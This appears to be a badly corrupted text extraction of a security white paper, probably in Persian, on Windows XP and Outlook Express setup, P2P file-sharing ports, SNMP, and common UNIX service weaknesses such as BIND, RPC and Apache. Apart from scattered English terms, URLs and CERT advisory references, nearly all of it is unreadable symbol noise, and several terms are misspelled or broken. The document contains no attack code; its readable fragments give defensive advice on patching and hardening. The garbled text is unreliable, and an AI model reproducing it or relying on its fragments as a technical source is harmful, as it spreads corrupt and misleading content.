XP Security h @ " ?
#
7
u
) Outlook ?
4
(N
5
("c 0 5 - Y white paper Office
# 2
$,<
#P<
? , 0 < -,
" Outlook
) X ) ("c "
bP 7 5 I )
6T5! " %P
H
I5 ,
( N6
0 5 - Y Offece Product
0, 5
$XP U '@ *
- <
)
5 ) 6 BH j &'
http://www.microsoft.com/windows/oe h @
I5 0 5 - Y
Updates page h @ " ?
^
QS $
9 Outlook Express
3 ?1
2 3@
Outlook +
"
* 5<
, \89
# ) #1 6
"
( N6
^
\X
$
7 K
&F
<@
0, 5 - Y Resource Kit Office
Outlook Express
U)
6
)
# ) #1 6
? 5 Uninstall
I
N W 3
( ,H ?
$
?
"), )
6*
)
0 5
?
ME
Setup
- Y 7 !89
, -,
•
Outlook SL 7
? 5 Add/Remove Program
•
Outlook ExpressSL 7
) {† "), ) )
O * ) Windows
" #
) " Outlook Express ) Outlook
a 5
& " - Y
Outlook ? 2 &Uninstall
& ) Add/Remove
Progtam ? # @ O *
0 5 6 ' ?@ MR/ ?# Outlook Express
?
XP
a 5 - Y
•
Outlook Express SL 7
) pqqq "), ) )
"
6h @ " 9
7 B
5!
, `4
F
Outlook Express Version 5. X/6.0 *
h @" ,
- Y
,
"
pqqq "), ) ?
5
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837
0, 5
Outlook Express Version 5.x/6.0 *
h @" ,
- Y
$,
"
ME
5
) {† "), ) ?
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219
0, 5
R4 S @ : 2 5
Wimdows Peer to Peer File Sharing (P2P)
6 ' ?# 2 ) 0, < '
User mode
I
" ,
H- Y
' $ K, )
" ]-
2
l' 6
h
-,
"
- 3• >'
I
4 -,
? G? ,
6-
I
N
6 #P<
" % ' '
? ,
)
SB
g
-,< K 7 < &
?
" ) +"
0, 5
)
6'
)d*
<
3
)V#
$ 6% 'V <
2,
U)
? N - Y
Q
" - Y
H? ,
I5 l ' 6
code Source
Napster b
6
9P T
" \ 2
- Y _
/) 6
, 5
6
2 H
U)
6
+" ) Download
)Y \
5
<2
I
3 ?1
7 L SB
g l'
6 "
I
!
B
B
512
U)
?#
1
&5
) ,<
d
l ' R4 S @ :
6
n 9 " -, < 1P
0, 5
(
7) Y -,< - <
^ P ) -,
0
E
F
6-
E F
U)
I
&'
6% '
,
)-
?
0, R V <
6% 'T
)?@
download 2 ,
7
5
„ 1# 2
LAN
,63
L ?
6
F
1
), 5
)
5 0 5
' $ 6% 'T
F) & WAN
6
H ,F , , ) S @ e G
(E
U)
'/ < \
N 7 4" - Y
K
-
1%
I
l'
\P
< ?# W 3
6
P2P
) (E
6% < ,
67 4 " X /
I5
?@
http wrappers " - Y
" - Y
) E F ^P
0,<
( ,H ? " ?56
- Y e 'j 4
I
), . ("c 78
I ^P , @ '
<] -,
I
0 ' , 6 3 -,
6 #P<
0 < ,6 3
% < I
_-,
Q 0, <
)
6
'
E F 0, 5 upload 2 ,
l ' 6
-, < T 5!
3
? &56 : ,
. 2'
T/
v 4 6
6
? "
i:
multithread
/ ) j &'
" - Y ? "
5
"E
g
DOS \ "
85/ ;! ,
) _P2P -,
U)
7 !89 23 , - 9 *
F) 0 <
<R V <
,F :
<
_… )
F) & ^
6 &'(
$
\X
]
L $
2
,
#4
:
_
% < P2P
$ " ]&
B'\
l '7 , , 0 '
=GX % 1
, ] #P<
),.
H %K
N` 6]
:
2
0
] 7c L. -, 6 K
6
n 9 " -,< K
6
\ 2 " ? ,
.
6
_
,
<b
.
TP
- Y )_
) B'
0, 5 F
$() *
% !
_0
F
6*
5
-, < < "), ) )
F) & U
1) U#
^P
SL
% !
P2P
?
I5
6
+,
,G
^
0, <
3 W 3 j1 #P
< )
5 - Y "), )
6*
:
,, 2 e G
P2P
a
" \ 2 b
-, < - Y T) ,
2
P
1
& ?@) <
! ". 0(123&
6
" - Y d *
4
4 )
"
6* ]
+
,6 3 TP,
6
"
:
#P<
' y
2
<
•
6
6
b
C 5!
application layer strings
'
E F•
- Y P2P
0
-, < download
. T
I
#P< "
- 3• 6? #
_exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip
0
"@
'D
j6
#P
< "
- 3•Z>'y
! " %&
(E
)Y 7 B
5!
6% ']
$l ' R 4 S @ : %
•
b
•
456 123&
DY/ I 5
a
? "
? H ) dowmloading
6
^P
|
<
" - Y •
T G
? "
? "
g
6
" - Y - .
.
#P<
6- N
^P
" - Y •
T G
) #P< "
•
- 3• >' 5
0" E
;N8
6 &'(
C L3 &'(
SL
H
5
3
•
15G ?
0, < P2P
T
P2P
6
b
I
) 4 -, 6 U )
" - Y •
-,< - Y
67 4 _ ) ) | F) 3] y
P2P
^P
'
0-,< ( N h) )
-P2P + ,
B'•
•
C L3 #P
<y
@
6 &'(
"
& \ 2(18 1 5
") - Y •
+ ,C 2
_••{{ $††}Š $†††† - 5< TCP
67 4] Napsster
•
_‹••Š $‹••p $‹••w - 5< TCP
67 4] edonkey
•
•s‹} $•s‹• $•s‹Š - 5< TCP/ UDP
67 4] Gnutella
•
6- 5 < TCP 7 4]Kazza
•
TCP/ UDP 7
4 ) www
wp‹w - 5<
! " % &# ,
Simple Network Management Protocl
(SNMP)
-N
5
SNMP " - Y
784 2
) ,
, #4) ) - " y
#4
I 5 ?@ "
#
SB
g
$T
0 <
1
)$
I 5 SNMP %# ) 4 "
- Y TCP/IP
- Y
P ' 4
#P
< 7) Y
6
6( '
-
) 6Access point $ 6ˆ K $ 6 ) $ N4
'
0 <
SNMP
,
6( 4
^
6N
3
2 ( 4TP
B %
,
6- N
$SNMP
-, < - Y
b
o
F
&
$
SNMP
N& S
^P
%
< 0_, 5
- Y
] #P<
)
3
$l '7 !89 " - Y
Q 0, <
R4 S @ ^
?
5 SNMP
u
- 5< *
$SNMP
0_, *
L3 7
L
_U )
3
,K
B!
" ,G b
R4 S @ ^
< $h
_?@
/
X !
6-
' )
!89
-,< %L
3 M,6nH ) S
-,< K
6v
6( 4 , K
"
$SNMP
*
I5
j ,4
]
< TP,
P
"
- Y
6N
6N
O*
H
e 'j 4 7 L ? ,
6T, " - Y
- 5< *
#4
PG ) , K
R4 S @ ^
3
, G ) T G' SNMP
,G
" $SNMP ) )
,1 "
I5
7 K
&F
SNMP
6( 4 "
<
0, <
R4 S @
^
, ) ,
) 7 !89 Z ',
2 5F
)
H $l ' R 4 S @ ^
- Y SNMP
3 785/ &
c L. $ N
#4?
bP
R4 S @ ^
6*
5 i: j &' I 5 ? ,
6N
SNMP
6A) " - Y (,! 0, 5
! N " $
#P
<
A) " [
P e 'j 4 A N 0,<
6
0, <
3
gV
"
PG ) , K (& # ) -,< 1P
^ P
SNMP 5 , H
? G -, < &
<
) 6
3
7 & E ) 7c@ 2<
]
V
^
- Y
6A)
6( 4
6A) " [
0_78#
,
6A) 0, 5
-, < - Y
,
6A) " $SNMP
)Y
" ] DOS \ " 7) Y 785/ ( E
? '
0, <
I5
$qs …pqqp CERT – h @
R4 S @ ^ 0 5 -,6
0
6N
! B
5F " $ 6( 4 "
* ] SNMP
- 5 _
- Y $ #P< y
I 5 -,< - Y
:
I K 6N
H
, 5
6T, " - Y
6A) W L3
,1
K
]0, <
("c ,
U)
? G SB
g )0
2#5
#P<
, 7c .
A)
SNMP0, <
Point
6- N
U
1) U#
-, < d *
0
3
$UPS
6N
^
)
$ 6 N4
,
7) Y
/f
=GX % 1
,
:
9P
Bridges ) access
% !
P 785/ &1@ " %
#4
B5#
I 5 -, < - Y
SB
g SNMP " 0
#P< 7 & E $ )
SNMP ,
, b
) Windows Service (&B
SL
6*
$SNMP
6
SL $ #P
< )
6
7) Y
embedded
e 'j 4 7 L $SNMP
5 TG'"), )
F
2
6*
0 <
- Y
785/ Q
0
$() *
* SL
Q 0, <
-
&
- 5 "), ) % !
+,
6*
5 T G') SL e 'j 4 7 L l 'U )
SNMP
l ' R4 S @ :
P
5 CP
0, -,< K W L*
#P
<% !
6
0 < ,6 3
+
$ #P<
-, < % L
)
F
5 $SNScan N 4
6N
)
0 5 - Y
. Foundstone. http://www h @ n 9 "
" - Y
? #
#
0
SNMPZ F ) SL W L3
GF
?
^
% !
T G'd *
-,6
)
" - Y
SL )
"b
5
I5
A)
" ?
) #5
?
?
<"
67
# n.7
a < ,6 3
-
"2
Com/knowledge/free_tools.html
'
$
2
netstat
w•p ) w•w
)
! ". /0(123&
SNMP SL
I 5 ("c 7 B
5! $SNMP "
b3
) 6- N
H,, e G
?@ ?
("c
7,
U#
,
0
KF
0
(E
( E
2
6&
7 L
- 4- ."
)- @\X
4 )
F) N 4
6 @ " U4
(E
6U )
SNMP
E F)
7 B
5! 2 netstat-an
H,, )S @e G
$SNMP
-, < - Y
) e 'j 4 SNMP Community
] 13
F)
_ P
!
h,/ % H SNMP Community
F)
Community SNMP Y*
F)
6 <
! " %&
DY/ 7 ,H ?
0 5
")
456 123&
$l ' R4 S @ : %
DY/ I 5
6, "
-1 < $( ?
! "+ ,
I 5 $SNMPv3
) 6( 4 , K
27
456
SNMP ? 5 TG' g
?@ " - Y 7 ) X (,! 7
P
T,
" - Y
_?# 7
Patch *
2 3@
?
$? ,
$)
)
, 1 7 L*
"
TCP/UDP
w•w 7
,
4] , K5
0
K6
),.
agnt b
^
b
agnt
6@
B' #P
<
(E
6
% !
SL $-,
) )
P $
)
6-
,1 b
3
,
? &
P
A R 4 W L3
T
("c T
P
!89
y
SNMP
3
3
6N
"
?
6*
B'T) ' " - Y 0
? 5 V8
w•p 7 4 )
2#5 l ' J) 0
$?@ " ,G ) pqqq"), )
6
9
F) F 3 7 L
l '7 B
5! ?
6
-,< K
SNMP
B
SNMP agnt b
6
6
N&
SNMP " - Y 7
*
l '7 B
5! 0_TCP/UDP
) X #
- Y SNMP agnt
] 6-
$CERT Advisory CA-2002-03 5 5X j*
0 5 GF
[
6& ? G
?
1
) $,<
Q
0
(E
( E IPSEC
& ?&
B'
)
0 < +H )
` 6
?@ " - Y 7 ) X (,! 7
+, 8
456
SNMP ? 5 TG' g
I 5 $SNMPv3
) 6( 4 , K
P
T,
" - Y
_?# 7
W 3
"
2
0
)
) 7
$)
)
*
SNMP " - Y 7
P!
L )-
h,/ % H
g
,
O*
0, < )" @
W L3
3" ?
N&
6& ? G -, < - Y ] community
- Y _
( #.
] 6-
("c
:
2
0
I5
N
u&
("c
"W 3
P
F 7 # " - Y
(E
P
!
6&
$http://www.sans.org/resources/idfaq/snmp.php h @
6 ),.
-,< '
-, <
K
0
b)
w•w 7
B' #P<
) )
6-
l '7 B
5! 0_TCP/UDP
#
#40
4], K5
(E
$-, < & 5
$
,
F) F 3 7
6subnet 2 SNMP " E
'
B
I
&
- Y
SNMP
9
w•p 7
4 ) TCP/UDP
L
6N
,
I5 C
'
) X
y # B' ,
0, 6 ( E
Q
I c2 '
R4 S @ ^
2
U
1) U#
!"
1
23
4 0, <P
7 !89 "
)
0
)
%K
25
:
-, < =! > ?@
56 $
5B
!C
8
? ,
)
5L M 9
A
'D
(E
! 5E 2'
/)
F
&1@
6 GH )
5 2'
H? "
?@
P 4)
"
R4 S @ ^
3W 3 P
B
9
F) % 1
,
' ?5F
) - 5 - Y -,< 3 <
$
3 M ,6
%
,
, N ?#
-
) 6? "
& 5
?5F
^ 2
"
S @^
N &1@ )
S
6@, 5
D Y/ c
) [
3_
O * 7
<
\
R4 S @ ^
) 6 Y/]
) X
F 78#
" V,
,G
6A)
2
,
,3
%K " 6
O * M,6? G
Cod Red )
% !
7 !89
? @ > GP
8 $
B I
6
?
Q
6U )
6 &
$ ?5F
0, 5
) 6(
I
RN6 2
#P
<
E )
6
" - Y Z
I
N
) !
Y 785/
T) , % !
=GX ^
N` 6?), ) - # M 9
(
&@
I
J
0
,G
6
-
6
O*
I
56$ % !
-")
P % !
: ),
F 7, ,
, - .
6; . " -
"
M 9" ) , < % !
@)
&' * +
# $% !
6
R4 S @
<
b
R4
0, <
) U#
R4 S @ ^
F) B
!$
)
2
R4 S @ ^
R4 S @ d *
N 560
"
,< ,6 3 K
6 'G " U4
2
<) , , e G
% !
$ R4 S @ ^
"
6%
c
3
6
! 5E
4 63U
$
1
=GX
N 4) B - .
% !
6
R4 S @ ^
-, " )
<@ ? @
^
&1@ )
!
? "
F) " [
< )@
785/ ) 7 , , SB
g $,
6 '?5F
#P
<)
F
? ,
"
)
4 ,
1)
$
- < ?@
R4 S @ ^
"
% !
6 S
0
3
=GX
I
bP
G )
i:
"
-
\
785/
F
-, 5! -)
-
-")
K6
F
-
F
, 5
- Y % !
U#
R4 S @ ^
R4 S @ ^
("c
6%5G1
% <
B5# ) , Y 7 !89
? F
2 5F
("c 7 ,H )
6
I ;&2
- Y
-
? F i:
0, 6 ( E
)
- <
b
f
! "M &# ( $
% !
"
, G 785/ ?
? G _7) Y
2
?
6
# $U#
0
6 * ] U#
$ -,< ( E -
)
a- 5
BIND Domain Name System
Remote Procedure Calls (RPC)
Apache Web Server
Generl UNIK Authentication Accounts with No passwork or weak
passworde
Clear Text Sevices
Sendmail
Simple Network Mangement Protocol (SNMP)
Secure Shell (SSH)
Miscon figuration of Enterprise Services NIS/NFS
Open Secure Sockets Layer (SSL)
BIND Domain Name System
)
-
$ (Berkeley Internet Name Domain) BIND &'(
h
- Y DNS_Domain Name ] "
BIND 0
/ 5
IP h @
_http://www.srco.ir/ a
#P
<
\ " C L3 $ 785/ ( E
( E ?@
I5 S
^P
1
) $, -
- 4 #
(E
? ,6U)
M,6
0, <
R4 S @ ^
) -,
,
!"
#4
DNS T# < ")
BIND
K6
j
CA- CERT
785/ N " , 5
dOS \
K
:
l 'F
6v 4 T
"
0
H ?@
-,
) - Y DNS
;!
BIND -, 6 U )
Dos \ " F
>/ 0, <
R4 S @
,G %
Z
#4)
W
ZF
$ Dos \ " F
B
5F " 0,<
" F
!
L3
) X
",
Cache
< TP,
^
-, < =
7 K
&F Advisory2002-15
H
Overflow \ "
3
:
Resolver +
^
")
<
"
- 4
F ) DNS
3
2
$ 3
7 K
&F
",
F) :
5F
2
6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 ,
,, 0
5
" ,G " 6
N ")
2
0,6
<R "
R4 S @ ^
,
CA -2002 -19 CERT Advisory 1 0
" F
$
" $l '785/
K6
3 #
1 0
E
? & ) 9
785/
5 $ 6% 'S
:
? '
I5 ?
, $ 5 ,H
) Buffer Overflow
=GX
?@ ?5F
< TP, ,
L Bind deamon ? @ )
l '%
?@ "
- Y -,<
? G
? 5 M 9
? , ("c 6 @ (, ! a,
*
0
(, ! ) DNS U )
<8 BIND ? ,
)-
F
I5
785/ ) O * _Dos] Denila of Service
!
6U )
g7
% ,P I
/ - N F ) BIND " - Y
?@
0, -
I] ? &
- 4
,
R4 S @
O *
/)
N
?@ " ) - Y l ' GX) " ? 5F
- Y
@
,
6
6 @ ?), )
1G' I 5
2
3 PG
g
0
#P<
6-
'784 ? G -, 6 U )
F
" ?5F
0
R4 S @
- 5 U
2 , 0, 5
-
3O *
,6 3
BIND "
SL ?@ )
*
1) U#
Ž6, 6 U )
1
&
S
- $() *
, -, < K BIND " *
#
+,
6
? G? &
5 C
P
,
#47
0,< ,6 3
+
)
) K % !
BIND "
- 5
6Patch 2 3@ " - Y
K
? 59 BIND *
?@ "
" - Y 7
SL BIND #
5 %
S @ T5 / $,< -,
Patch %
, 6 3 j 5 X.Y.Z 7
Level Patch
)
?@ )
"
?@ ?
)-
, N
2 3@ "
H
0
)
Z) *
Symantes
6 @
-,< ( N
N 4
- Y & $
I
" ?
R4 S @ ^
d *
P
3
$
0 < ,6 3
4
"
BIND
bP
)
-,<
F)
R4
W L3
Y$ B
-,6 X
*
N
4
2 3@ 0 5 SL
#
5
2
'
ISC
>! $ BIND
6-)
0
I 5 DNS
R4 S @ ^
*
2 3@ $
6, 6
6
! " %&
a
/
-,< SL BIND *
F
6 #) "
-,<
2 3@ SL "
-, < K BIND *
N
,1 b
0 5 %
*
7 K
&F -, 6,
Version 9.2.2 v
bP
-,< SL
X !] -,
5 ,H
Q
L
ISCb
'
)-
6
-, 6,
$
7
BIND #
^
:
?
(N
/ ? 59 BIND *
("c 7 !89 v named a
0
3 *
( E _-,
dInternet Sofward Consortium :ISC
! ". /0(123&
%
nH
456 123&
DY/ I 5
)
•
l89 & named ?@ ] BIND deamon ? 5 TG' g
_
N 4
I 5 0, -,
BIND &'(
'
?
DNS -, 6 U )
I
? G
_?@ ,E ? 5 TG' I ] W 3 7
K6
u 3
0 5 MR/ 6
)? ,
,1 b
6Patch -, 6 U )
-,< K
B5# 7 !89
'
0, 6 Z
Checklist j* ) CERT
"
*
N
(N
2 3@
" BIND
-,< K 7c
T5! "
) "
•
I5
?@ ?# 7
2t
5: SL
:
0, K5 - Y $ UNIX Security
Banner
^
g *
j 4
)
785/ ? 5
BIND GH ) *
- 5<
-, ` 4
) MR/ BIND "
•
I5
Version String
0, K5 2 &N F _ named DNS servers) % '
DNS
[? , 6U)
Zone 7c
Zone 7c
C
'
T
GH )
•
?#
? # _secondary DNS servers], K5 6 'Domain
^P
Child ) Parent
^ P
? # " %
) T G'
g
0, K5 - Y _Forwading] y
#B
5! %
DY/
6 Domaion
R )] Delegation
) ') _ 1t
•
glue fetching ) Recursion ? #
I5
0, K5 TG' g DNS Cache i .
5 ?
H
. ) named" " - Y
[
non – privilage
:
? G BIND 2
Privilage h @ " BIND 9 - 5 < *
DY/
, K5 ),.
•
I5
BIND $
Z F Chroot
0
0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @
BIND -, < =
R4 S @ ^
bP )
3 785/ %
DY/ I
a 5 - Y
h @ " ISC
BIND
0
h @ " ISC
0
:
Dos
R 4S
@
" ?
:
•
- Y http//www.cert.org/advisories/CA-2002-15.html
BIND
- Y
9
"+
8
:
DoS
R4S
@
: 2,
http://www.isc.org/products/BIND/bind-security.html
•
6
)
BIND
25 SL
I 5 ("c 7
4" - Y ) 6@
) Running the BIND 9 DNS Server Securely a h @ " ?
0 5 - Y Afentis h @
$U c
-,< K 7c
<@
Remot Procedure Calls
(RPC)
K62 )
F
H
B
5! - N F
F
0, <
U)
( E
K
I
" )-
T
n 9 " ()
?@ " - Y RPC
- Y NIS ) NFS % 'V < $ ) - "
,
I #P
< -,< +"
6
; G RPC
,G
6=GX
F)
6U )
Q
RP @
? 5F
RPC
6" E
6
" - Y
T % ) ) 1999 T
RPC
,G
RPC " - Y
6
T) ,
I
?@ "
f
F
)-
T 5G ,/ " j
0,
)
H"E
@
=GX
S
DoS \ " 785/ Q
R4 S @ : )
: %1
, $ #
g F
I
F) & C 3 0
0,
i:
& @
' )-
y
6,
-,< =
-
785/ 8Q
RPC
\ ' 7 ")
6U )
RPC DCOM
;! "), )
?@ )
U
R4 S @
^
- $() *
-,< SL RPC
F
2000
^P
:
#
ZF
3 M ,6
K6
-
(
2, ,
0, < , 6 3
=GX
6
-,< YB* 785/
+,
1
) U#
6*
5
0, < P , , e G
! ". /0(123&
"
# Z F" ?
$ rpcinfo"
a,
RPC
Program
)
- @
R4 S @ ^
)
N 4
" - Y
RPC T) ,
6U )
RPC SERNIS
Number
100083
Rpc. Ttdbserverd
P!
Rpc . cmsd
100024
Rpc.statd
100005
Rpc.mountd
100232
sadmind
100235
Cachefsd
100249
Snmp Xdmid
buffer Overflow 785/ n 9 " C 5! RPC
H- Y Z
6-
100068
) 6:3 W L3
' ) ("c
? # 2 $ Buffer overflow
R4 S @ ^
_O * , 7 L SB
g]
j4% H
) Z:3
:
, <P -, "
b
RPC
, 5
F
, 5 T
, B ) h / K6?#
O * , Overflow & @
1
" E
RPC
g-
F =GX
4 - Y
6U )
l ' R4 S @ ^
( E ,!
"
" ,G #
" & @
0, 5
2
6
- Y
4
) X
RPC
"
$
I'/ ?)
1
-
6U )
"
K6U )
:
.
"
Z F% !
Z F T 5G ,/ " j
g
6
?# ,
456 123&
P%
DY/ I 5
•
6MR/ ) ? 5 TG' g
0,<
F) ? @ MR/ ?#
$-
, 5
F
) - " )"E
RPC
) )
6 'F
! " %&
a
B
! 0,
b
' F
' - Y ,
6'
6U )
5 #P
< )
?@ "
•
-,< K Patch 2 3@ SL
a
0
- Y _http://sunsolve.sun.com ] h @ " U c
http://www.ibm.com/support/us
0
a h @ " IBM
,
&'(
AIX
- Y http://techsupport.services.ibm.com/server/fixes)
) http://www.redhat.com/support/errata a h @" U
0
7
L
http://www.debian.org./security
- Y
Patch 2 3@ SL ) 6 @
9
1
I5 E F7 B
5!
0 <( E 5
135 7
4 ) RPC
portmapper
0, 5 V8 T) ' )
UDP ) TCP
, K5 V8
$ l ' J) "
785/
5 %
785/ "
3
B
^
32789, 32770 Loopback
6
DY/
windows
) i:
^
B!
_ UDP ) TCP] 111 7
^
)
F
c $ KF
F
[
g
B! ,
g
4
5
4
4
_UDP ) TCP]
67 4
? 5 TG'
" - Y 0, 5
5/
1
) - PBuffer overflows
0
TP
" %/
NFS % ' 6
$
,
^P
a
6
P IP/ ? & " - Y
1
, 3 b'7 L
R4 S @ ^
- Y
"
6h @ " ?
RPC ^
% ' 6
j 4
:
,
#4
nfsbug" " - Y
B5# 7 !89 R 3
a 5
http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html
http://www.cert.org/advisories/CA-1997-26.html
http://www.cert.org/advisories/CA-2002-26.html
http://www.cert.org/advisories/CA-2002-20.html
http://www.cert.org/advisories/CA-2001-27.html
http://www.cert.org/advisories/CA-2002-25.html
http://www.cert.org/advisories/CA-1999-08.html
http://www.cert.org/advisories/CA-2002-11.html
http://www.cert.org/advisories/CA-1999-16.html
http://www.cert.org/advisories/CA-2001-11.html
http://www.cert.org/advisories/CA-1998-12.html
http://www.cert.org/advisories/CA-2001-05.html
http://www.cert.org/advisories/CA-2002-10.html
http://www.cert.org/advisories/CA-2003-10.html
http://www.cert.org/advisories/CA-2003-16.html
http://www.cert.org/advisories/CA-2003-19.html
Apache Web Server
0
)
5
O) ? , 6 U )
78#
(A-2002-,CA-2002-2717]
-
a
3W 3
R4 S @
6 ' " 7, ,
F)
& PHP ) CGI
0
bP
!
?@
)
4@ -, 6 U )
_DoS] U )
h / 6-
-)8!
6 „1#
& O) -, 6 U )
" $?@
4@
? `56 1
) <
R4 S @ ^
R4 S @ ^
F) 7
# _Apache]
O) -, 6 U )
4@ , ) 6T)„
3W 3
R4 S @ ^
"
4@ $ _IIS] ' #
) %K
0
6=GX
2 1
),
? 5 TG' g
) 6% '2 3 , - 9*
)j 5
) - " -, 6 U )
_
3)
#
] -, 6 U )
? '- 9*
$() *
,G )
e '7 L
4@ $l '? #
, 5
- Y "), )
3 W 3 R4 S @ ^
4@ 0, <P
-)8! 0
4@ Z F
SL $ U
I =B*
B!
,
&
H U#
6
1) U#
"
4@
+,
N
6*
6*
&
)
5
"
"
?
" \ 2 0 5 SL &
0,<
+
4@ SK-, 6 U )
R4 S @ - . W L3
("c 7 !89 S
a 5 - Y
h @" ?
! ". /0(123&
"
6@
I5
6h @ " ?
$
Apache 1.3.x
:
•
http://www.apacheweek.com/featurity/security -13
h @" ?
Apache 2.0.x
| http://www.apacheweek.com/features/security-20
•
R4 S @ d *
ah @" - Y
- .
I 5 ("c
0, < P
'7 !89
G X) Z
W
0
"2
,Y
$-,< - <
6h @
("c 7
4)
L3
& http://httpd.org/
! " %&
a
K
"7
4$
456 123&
4@ O) -, 6 U )
DY/ I 5
•
-,< K patch 2 3@ SL " ? 59
"
6 @
http://httpd.apache.org h @ " ?
I5
:
2
0 5 - Y levels Patch ) 6 *
h @" ?
$
4@
Q code Sourde
6*
6Patch 2 3@
-, < K
I5
http://httpd.org/download.cgi
0 5 - Y
h @" ?
GX) 2 3@
'
) 6 @
I5
0 5 - Y | http://httpd.org/dist/httpd/patches/
" ?
$
4@
6*
code
Q
Source
I5
0 5 - Y http://httpd.apache.org/download.cgi h @
h @" ?
6Ptch 2 3@
-, < K
0 5 - Y
- Y ? @ " +F ? G
#B
5!
mod
.
I
4@
(
R4 S @ ^
"
("c :
("c 0,
-
"2
% 5
2
4@
)
)
$ I 2,
),
) X
6-"
.ZF
5 _CA-2002-27] –ssl
%
- 5 - Y SSL
O F$
? G
4
E " E %H ,/ W 3
0
4@
0 < ,6 *
$ chroot
Login
8Q 0
C
/
0
)
- Y
•|•
G',
c
0, 5
$ -, 6 U )
0
6)
I5
! patching " ? 59
,B
6T)„ C
'
- < # 2
Open
) 6 @
http://www.apache.org/dist/httpd/patches/
% !
) X
'
F"
l '-)
,E = G ;!
B 4 Chroot
) •ROOT
, E = G;!
? G,
Chroot 0
session
F
6% '
5 -,6
F W L3
H $, 5 , 4
6
),. $ l '
) E $ /chroot (
U)
4@
?@
F
3
G',
- <&
S
I 5 O) -, 6 U )
0,<
&'(
0
- Y
)
7,
F 3
*
"
9
1G'W L3
, 5
3
0 '
#
("c
?@
K loggingW L3
'# < ) [
U)
:
6% '
6 '? @
a 5 - Y
g
'
6T)„
I
)
, "
S
?@
I5
B
"+
" ,
6A)
? G$ I
I5
) -, 6 U )
g
) R3
4 ) 6 BH $
logging 7 B
5!
H
)"E
B'
,G
("c 7 , 5 ? @ &1 @
6%
1G'\
4@ -, 6 U )
("c 2
6
0, 5
?#
4
, ?# S
•c 7) Y
2, 0
6
6
6U)
,
F 7 !89 " W 3 I
) •c
!89
!89 +P
2#5
W L3
3
4@ Chrooting
("c O) -, 6 U )
R4 M :G
7 L c
4@ -, 6
6- Y Z W L3
F) chrooting
-, 6 U )
F %K
15 /
)
K W L3
6 ,'
5
F) chroot " z 3 ) % !
+
P ) <
6 #6
6U )
?# $, 5 " g@
P F7 [ ,
9P
3
0 5 Z F chroot b.
?@
b.
< TP,
"
H /chroot/httpd
("c 0, 5 6 '
B
:
)
F & 7
2, 0 < , 6 *
^P
,6 *
I
6j*
# 2
CGI,PHP
0, @
4@ #
F
c
2
0
1G') Z F chrooted 7 L
'#
-)8! 0
W 3^P
>
P l'
S
),.
:
8Q 0,
C
5<
'
6 '$-, 6
<
K<@
(E
< @ •c
I 5 0,< ,6 3
http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x
0 <- Y
http://httpd.apache.org/docs2#5 -, @ j 4 b <
F
h @ " Apache
)
)Y
2.0.x
0 < - Y 2.0/logs.html
) CGI , PHP " #
?
)
•c
<
P
[
l ' GX) 0,<P '
,,
$
( ,H $
- Y Π#
=GX
POST ) GET
W L3
S
j< 4
0, 5
6 'O)
6% '
("c
&1@ ? j &' I 5
)
O) -, 6 U )
- 56 l '
^ P
0, 5
6
_detection Intruder] 25/&
N 4)-
6
^
mod_Security n 9 " ,
R 47
6
.
6 „ 1#
7 B
5! ? 5 •c 0 5 POST ) GET
bP
O)
P
" - Y Z ) F
ModSecurity
d *
•c
F
5/
0, 5
"
K
N 4
F
" $ ModSecurity
4@ -, 6 U )
-http://www.modsecurity.org/
-http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126
a
#
4
N ],
Z
"
5 T G' g
I5
,!
#
, 5
F
2
6? "
0_,<
<
F
6 ' Apache User Id
H
, 5
6 '
User Id
F
:
,F
)
- Y 7
#B
5! - .
K<@
,
- 5
- Y
4@ . 6
? # 2 SuEXEC
4@ ?
. CGI ) SSI
) 6@
P
I5 ) :
2
a 5 - Y
"
/
6
2 , 0 , < O) -, 6 U )
L 3 CGI )SSI
-, < <
,< ("c j
3 $ setupid Root
$
User Id
%
b
" - Y
) X #
7, , S
0, < , 6 3 MR / $ ? 5F
) X
SSI
?@ ( &1) -, 6 U )
P 7) Y User Id
" - Y
- Y )
F) ? @
) PHP,CGI,SSI "
F ) 2 < ?# ) j6
;!
) PHP,CGI,SSI
F ? # $ SuEXEC 0 < - Y SuEXEC "
3 'P
9
")
) SSI,CGI,PHP
#
Server Side Includes
3 ,
6? "
06
#
",
0, K5 TG' g
#
:
SuEXEC
(
3 <) S
0,< ,6 3 N
6h @ " ?
6
,
# 4 (,!
6- Y/
SuEXEC "
http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x
0 <- Y
http://httpd.apache.org/docs- h @ " Apache
2.0.x
2.0/suexec.html
0 <- Y
) cgi- bin
6
0,
MR/ $
5 e 'j 4
B / " S1:
. W L3
6
#
F
a
5
HTTP header
("c ) ( E 6
l '\ X
40PHP "
23
- < W L*
("c
5 )
7 !89 K ; !
C
'
6
)-
#
% <
25
z 3 1 2
4 ? 5 T G' g
a
B5# 7 !89
safe 1/
'
PHP
h @" ?
W
8Q 0
C
G X)
P
I5 ' X
0 < Corss Site Scripting XSS %
h @" ?
L3 2
http://www.securityfocus.com/printable/infocus/1706
0 5 - Y
T)„
W
L3 2
"
,G
mod_Security
B5# 7 !89 -,6
Injection SQL&XSS % < R4 S @ ^
0 5 - Y
1
)„ " - Y
DY/ ;! ,
0 5 - Y
&'(
F " ? 59 T L.
#
:
) &5
2
0
56 &K/ &
# _ http://www.cirt.net/code/nikto.shtml h @
0
<@
http://www.modsecurity.org/
6
6& " ?
)
CGI
% H] Nikto
)j 4
6& 2 P
,Account
2N P
2
9P % G
$?
,K
,6 3 N
$?
6
<)
6, )
Q0
b
,K
f ) T) ,
-,< K
P!
6&
$
C
5
e *f 2N P
<) $ P
!& " - Y
!89
$-
6
)?
) % ' DY/ I
?@"
0
6) 6 '-,< d *
,6 *
E +
+
?@
" - Y
?# $?
H $-,< -
P
, K " U4 0 <
6" E ) 7 "
F
$
-,< , K +
?@?
"E
1G'$
SB
g
$
-,< , K +
?@?
"E
1G'$
SB
g
, KF) ,
?@
(E
DZ
H$
E
N`6?),
)
?@ =GX
)
)
/j
)
R
0, < ? "
b
P
!&
:
P! &
^P
< TP,
-,< K
6account
Y
6%
4"
75 I
#
u
P!
F)
2
) X$ 5 - Y
